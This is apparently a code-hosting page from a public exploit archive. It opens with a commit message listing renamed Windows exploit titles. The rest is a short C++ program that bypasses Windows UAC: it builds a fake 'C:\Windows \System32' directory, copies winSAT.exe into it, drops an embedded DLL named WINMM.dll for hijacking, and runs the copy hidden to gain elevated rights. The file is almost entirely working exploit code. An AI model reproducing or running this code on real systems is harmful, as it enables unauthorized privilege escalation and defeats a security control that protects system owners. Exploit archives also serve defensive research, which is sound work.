925e6e0629
2 changes to exploits/shellcodes Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (PoC) Microsoft Windows 10 (x86/x64) - WLAN AutoConfig Denial of Service (PoC) Windows 10 - Desktop Bridge Activation Arbitrary Directory Creation Privilege Escalation Windows 10 - Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix Privilege Escalation Microsoft Windows 10 - Desktop Bridge Activation Arbitrary Directory Creation Privilege Escalation Microsoft Windows 10 - Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix Privilege Escalation openslp 2.0.0 - Double-Free OpenSLP 2.0.0 - Double-Free Windows Speech Recognition - Buffer Overflow (PoC) Microsoft Windows Speech Recognition - Buffer Overflow (PoC) Microsoft Windows Utility Manager - Local SYSTEM (MS04-011) Microsoft Windows Utility Manager - Local Privilege Escalation (MS04-011) Windows Firewall Control - Unquoted Service Path Privilege Escalation Microsoft Windows Firewall Control - Unquoted Service Path Privilege Escalation Windows DVD Maker 6.1.7 - XML External Entity Injection Microsoft Windows DVD Maker 6.1.7 - XML External Entity Injection Windows - UAC Protection Bypass via FodHelper Registry Key (Metasploit) Microsoft Windows - UAC Protection Bypass via FodHelper Registry Key (Metasploit) Microsoft Windows 10 Creators Update (version 1703) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation Microsoft Windows 10 (Build 1703 Creators Update) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation Microsoft Window Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation Microsoft Windows Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation Windows 10 Diagnostics Hub Standard Collector Service - Privilege Escalation Microsoft Windows 10 - Diagnostics Hub Standard Collector Service Privilege Escalation Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit) Microsoft Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit) OpenSLP 2.0.0 - Multiple Vulnerabilities Microsoft Windows 10 (Build 17134) - Local Privilege Escalation (UAC Bypass)
37 lines
No EOL
1.2 KiB
C++
37 lines
No EOL
1.2 KiB
C++
#include "stdafx.h"
|
|
#include <Windows.h>
|
|
#include "resource.h"
|
|
|
|
void DropResource(const wchar_t* rsrcName, const wchar_t* filePath) {
|
|
HMODULE hMod = GetModuleHandle(NULL);
|
|
HRSRC res = FindResource(hMod, MAKEINTRESOURCE(IDR_DATA1), rsrcName);
|
|
DWORD dllSize = SizeofResource(hMod, res);
|
|
void* dllBuff = LoadResource(hMod, res);
|
|
HANDLE hDll = CreateFile(filePath, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, NULL);
|
|
DWORD sizeOut;
|
|
WriteFile(hDll, dllBuff, dllSize, &sizeOut, NULL);
|
|
CloseHandle(hDll);
|
|
}
|
|
|
|
int main()
|
|
{
|
|
_SHELLEXECUTEINFOW se = {};
|
|
//Create Mock SystemRoot Directory
|
|
CreateDirectoryW(L"\\\\?\\C:\\Windows \\", 0);
|
|
CreateDirectoryW(L"\\\\?\\C:\\Windows \\System32", 0);
|
|
CopyFileW(L"C:\\Windows\\System32\\winSAT.exe", L"\\\\?\\C:\\Windows \\System32\\winSAT.exe", false);
|
|
|
|
//Drop our dll for hijack
|
|
DropResource(L"DATA", L"\\\\?\\C:\\Windows \\System32\\WINMM.dll");
|
|
|
|
//Execute our winSAT.exe copy from fake trusted directory
|
|
se.cbSize = sizeof(_SHELLEXECUTEINFOW);
|
|
se.lpFile = L"C:\\Windows \\System32\\winSAT.exe";
|
|
se.lpParameters = L"formal";
|
|
se.nShow = SW_HIDE;
|
|
se.hwnd = NULL;
|
|
se.lpDirectory = NULL;
|
|
ShellExecuteEx(&se);
|
|
|
|
return 0;
|
|
} |